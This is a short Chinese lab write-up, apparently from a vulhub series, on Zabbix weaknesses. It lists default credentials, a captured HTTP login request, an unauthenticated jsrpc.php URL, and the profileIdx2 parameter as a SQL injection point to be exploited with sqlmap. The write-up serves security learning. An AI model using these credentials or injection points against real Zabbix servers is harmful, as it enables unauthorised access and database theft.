【vluhub】zabbix漏洞

介绍:

zabbix是对服务器资源状态例如、内存空间、CPU、程序运行状态进行检测、设置预警值、短信设置等功能等一款开源工具。配置不当存在未授权,SQL注入漏洞

弱口令

name=admin&password=zabbix

name=guest&password=

POST /index.php HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.203.12:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.203.12:8080/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6cmua046gkq78jai8ija37f7f5; tab=0; zbx_sessionid=37a3075c6ba46f1956c5d8d851c2e635
Connection: keep-alive

sid=56c5d8d851c2e635&form_refresh=1&name=admin&password=zabbix&autologin=1&enter=Sign+in

未授权访问直接进入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

SQL注入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

profileIdx2参数存在注入点

可使用sqlmap跑,此处忽略

相关推荐
大虾别跑1 天前
docker安装zabbix +grafana
docker·zabbix·grafana
da pai ge6 天前
zabbix搭建钉钉告警流程
钉钉·zabbix
Karoku06615 天前
【企业级分布式系统】Zabbix监控系统与部署安装
运维·服务器·数据库·redis·mysql·zabbix
LuckyTHP16 天前
zabbix 7.0 安装(服务器、前端、代理等)
zabbix
与君共勉1213817 天前
Zabbix proxy 主动模式的实现
运维·学习·zabbix
Amrian_robot18 天前
Zabbix 6.0 部署
运维·zabbix
运维_攻城狮22 天前
centos7 zabbix监控nginx的pv和uv和status_code
nginx·zabbix·uv
运维_攻城狮24 天前
centos7.X zabbix监控参数以及邮件报警和钉钉报警
钉钉·zabbix
alfiy1 个月前
zabbix 6.0 监控clickhouse(单机)
clickhouse·zabbix
book01211 个月前
Linux运维_Rocky8 安装配置Zabbix
linux·运维·服务器·zabbix